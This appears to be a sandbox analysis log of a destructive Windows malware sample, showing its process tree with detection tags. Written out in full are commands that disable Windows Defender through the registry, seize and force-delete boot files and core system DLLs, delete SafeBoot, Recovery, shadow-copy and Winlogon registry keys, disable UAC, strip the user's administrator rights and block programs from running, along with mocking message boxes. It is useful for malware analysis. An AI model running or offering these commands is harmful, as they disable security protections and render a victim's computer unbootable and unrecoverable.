    C:\Windows\system32\cmd.exe /c "echo MsgBox "ぽんぽこウイルスに感染しちゃったよ(T_T)" ^& vbCrLf ^& "でも大丈夫！僕が直してあげる", vbCritical, "元気出して！！" > %temp%\message.vbs && cscript //nologo %temp%\message.vbs && del %temp%\message.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3732
  - - C:\Windows\system32\cscript.exe
      cscript //nologo C:\Users\Admin\AppData\Local\Temp\message.vbs
      4⤵
      PID:1836
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3496
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:2344
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:4292
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    PID:4692
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    PID:416
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableEmailScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:1288
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ThreatsReportDisabled /t REG_DWORD /d 1 /f
    3⤵
    PID:3992
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:2960
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DenyEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:3132
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:1072
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableIntrusionPreventionSystem /t REG_DWORD /d 1 /f
    3⤵
    PID:4376
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\winload.exe" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\winload.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winload.exe" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:596
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winload.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\hal.dll" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3112
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:3276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\BOOTVID.DLL" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\BOOTVID.DLL" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winresume.exe" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1848
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winresume.exe" /a
      4⤵
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\winload.efi" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4584
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\winload.efi" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winload.efi" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winload.efi" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winresume.efi" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:920
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winresume.efi" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootsect.exe" /a"
    3⤵
    PID:408
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootsect.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootim.exe" /a"
    3⤵
    PID:1292
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootim.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootux.dl" /a"
    3⤵
    PID:392
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootux.dl" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\kernel32.dll" /a"
    3⤵
    PID:4928
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\kernel32.dll" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\user32.dll" /a"
    3⤵
    PID:2352
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\user32.dll" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\win32k.sys" /a"
    3⤵
    PID:1836
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\win32k.sys" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\winload.exe" /grant administrators:F"
    3⤵
    PID:3728
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\winload.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winload.exe" /grant administrators:F"
    3⤵
    PID:2344
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winload.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\hal.dll" /grant administrators:F"
    3⤵
    PID:220
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /grant administrators:F
      4⤵
      PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\BOOTVID.DLL" /grant administrators:F"
    3⤵
    PID:1168
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\BOOTVID.DLL" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winresume.exe" /grant administrators:F"
    3⤵
    PID:4596
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winresume.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\winload.efi" /grant administrators:F"
    3⤵
    PID:2940
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\winload.efi" /grant administrators:F
      4⤵
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winload.efi" /grant administrators:F"
    3⤵
    PID:1092
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winload.efi" /grant administrators:F
      4⤵
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winresume.efi" /grant administrators:F"
    3⤵
    PID:4716
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winresume.efi" /grant administrators:F
      4⤵
      PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootsect.exe" /grant administrators:F"
    3⤵
    PID:4824
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootsect.exe" /grant administrators:F
      4⤵
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootim.exe" /grant administrators:F"
    3⤵
    PID:2188
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootim.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootux.dl" /grant administrators:F"
    3⤵
    PID:4016
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootux.dl" /grant administrators:F
      4⤵
      PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\kernel32.dll" /grant administrators:F"
    3⤵
    PID:3276
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\kernel32.dll" /grant administrators:F
      4⤵
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\user32.dll" /grant administrators:F"
    3⤵
    PID:432
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\user32.dll" /grant administrators:F
      4⤵
      PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\win32k.sys" /grant administrators:F"
    3⤵
    PID:1620
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\win32k.sys" /grant administrators:F
      4⤵
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4040
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableFileSystemProtection" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3124
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableFileSystemProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\winload.exe"
    3⤵
    PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winload.exe"
    3⤵
    PID:2412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\hal.dll"
    3⤵
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\BOOTVID.DLL"
    3⤵
    PID:844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winresume.exe"
    3⤵
    PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\winload.efi"
    3⤵
    PID:724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winload.efi"
    3⤵
    PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winresume.efi"
    3⤵
    PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootsect.exe"
    3⤵
    PID:3084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootim.exe"
    3⤵
    PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootux.dl"
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\kernel32.dll"
    3⤵
    PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\user32.dll"
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\win32k.sys"
    3⤵
    PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    PID:4396
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f"
    3⤵
    PID:4140
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f
      4⤵
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniDumper /f"
    3⤵
    PID:5036
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniDumper /f
      4⤵
      PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f"
    3⤵
    PID:4172
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f
      4⤵
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Recovery /f"
    3⤵
    PID:1868
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Recovery /f
      4⤵
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VolSnap /f"
    3⤵
    PID:596
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VolSnap /f
      4⤵
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS /f"
    3⤵
    PID:4304
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS /f
      4⤵
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemRestore /f"
    3⤵
    PID:4820
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemRestore /f
      4⤵
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /f"
    3⤵
    PID:672
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /f
      4⤵
      PID:2012
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v Window /t REG_SZ /d "0 0 0" /f
    3⤵
    PID:4840
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v WindowText /t REG_SZ /d "255 0 0" /f
    3⤵
    PID:2612
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ButtonFace /t REG_SZ /d "255 0 0" /f
    3⤵
    PID:2684
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ButtonText /t REG_SZ /d "0 0 0" /f
    3⤵
    PID:4568
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ActiveTitle /t REG_SZ /d "255 0 0" /f
    3⤵
    PID:5116
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v InactiveTitle /t REG_SZ /d "128 0 0" /f
    3⤵
    PID:724
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\HighContrast /v 1 /t REG_DWORD /d 1 /f
    3⤵
    PID:4468
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 10 /f
    3⤵
    PID:4188
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Display /v RotationAngle /t REG_DWORD /d 180 /f
    3⤵
    PID:2808
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExit /v "" /t REG_SZ /d "C:\Windows\Media\Windows User Account Control.wav" /f
    3⤵
    PID:2704
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v IconSpacing /t REG_SZ /d -100 /f
    3⤵
    PID:2112
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v IconVerticalSpacing /t REG_SZ /d -100 /f
    3⤵
    PID:116
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v TaskbarSmallIcons /t REG_DWORD /d 1 /f
    3⤵
    PID:4564
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ButtonHighlight /t REG_SZ /d "255 0 255" /f
    3⤵
    PID:1924
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ButtonShadow /t REG_SZ /d "0 255 255" /f
    3⤵
    PID:2968
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
    3⤵
    - Event Triggered Execution: Screensaver
    PID:4140
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 1 /f
    3⤵
    - Event Triggered Execution: Screensaver
    PID:112
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d C:\Windows\System32\Mystify.scr /f
    3⤵
    - Event Triggered Execution: Screensaver
    PID:4164
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Notification /v "" /t REG_SZ /d "C:\Windows\Media\Windows User Account Control.wav" /f
    3⤵
    PID:1132
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideIcons /t REG_DWORD /d 1 /f
    3⤵
    PID:3460
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Start_ShowClassicMode /t REG_DWORD /d 1 /f
    3⤵
    PID:5024
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v EnableBalloonTips /t REG_DWORD /d 1 /f
    3⤵
    PID:2768
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem /v NtfsDisableLastAccessUpdate /t REG_DWORD /d 1 /f
    3⤵
    PID:4016
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ErrorMode /t REG_DWORD /d 1 /f
    3⤵
    PID:4452
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_DWORD /d 1 /f
    3⤵
    - Event Triggered Execution: Screensaver
    PID:3608
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_DWORD /d 0 /f
    3⤵
    - Event Triggered Execution: Screensaver
    PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "echo MsgBox "ミスったわすまんな", vbCritical, "わざとじゃないよ" > %temp%\message.vbs && cscript //nologo %temp%\message.vbs && del %temp%\message.vbs"
    3⤵
    PID:4072
  - - C:\Windows\system32\cscript.exe
      cscript //nologo C:\Users\Admin\AppData\Local\Temp\message.vbs
      4⤵
      PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "net localgroup Administrators Admin /delete"
    3⤵
    PID:1848
  - - C:\Windows\system32\net.exe
      net localgroup Administrators Admin /delete
      4⤵
      PID:4508
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators Admin /delete
        5⤵
        
        PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4368
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:1004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3000
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4928
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:6196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4580
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:64
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2964
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4308
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4908
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2808
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6660
- - C:\Windows\system32\cmd.exe
